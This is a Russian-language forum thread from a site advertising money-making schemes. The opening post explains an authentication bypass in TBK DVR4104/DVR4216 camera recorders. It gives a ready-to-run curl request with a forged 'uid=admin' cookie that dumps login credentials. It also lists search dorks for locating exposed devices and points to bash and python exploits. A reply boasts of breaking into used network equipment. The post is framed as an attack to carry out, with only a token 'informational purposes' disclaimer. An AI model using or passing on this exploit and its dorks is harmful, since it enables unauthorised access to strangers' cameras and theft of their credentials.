• VLMI - форум по обмену информацией. На форуме можете найти способы заработка, разнообразную информацию по интернет-безопасности, обмен знаниями, курсы/сливы.

    После регистрации будут доступны основные разделы.

    Контент форума создают пользователи, администрация за действия пользователей не несёт ответственности, отказ от ответственности. Так же перед использованием форума необходимо ознакомиться с правилами ресурса. Продолжая использовать ресурс вы соглашаетесь с правилами.
  • Подпишись на наш канал в Telegram для информации о актуальных зеркалах форума: https://t.me/vlmiclub

Эксплуатация DVR камер

XDG12

Местный
Сообщения
123
Реакции
234
0 руб.
Серия устройств TBK DVR4104 и DVR4216, а также сторонних производителей на базе этих версий уязвимы к обходу проверки подлинности и
с помощью простого заголовка Cookie: uid = admin можно извлекать учетные данные. Главная проблема заключается не в уязвимости, в подобном оборудовании, они довольно примитивны, а в большом количестве камер подключенных к сети. TBK предлагает множество версий оборудования с цифровым лейблом и ребрендингом оборудования IoT DVR. Многие бренды и интернет-продавцы рекламируют устройства под разными именами, и для некоторых пользователей их может быть сложно обновить.

Проэксплуатировать уязвимость можно отправив запрос:
curl "http://target/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
22589
В ответе вы получите заветные логи и пароль.

Найти камеры можно по доркам:
inurl: login.rsp
intitle: ‘DVR Login’
html: ‘/login.rsp’
‘Server: GNU rsp/1.1’

22590

22592

Для просмотра видео необходим IE с установленным плагином DVR.

22593

Сплойты на bash, python

Статья представлена исключительно в ознакомительных целях, ни одна ссылка не является рекламой.
 

Jamesbond1990

Могук

Jamesbond1990

Могук
Местный
Сообщения
187
Реакции
137
0 руб.
Я уже на столько обленился, что мне проще когда я людям сетевое оборудование б/у настраиваю, проще его ломануть, чем сбрасывать, потом меньше настраивать
 
Сверху Снизу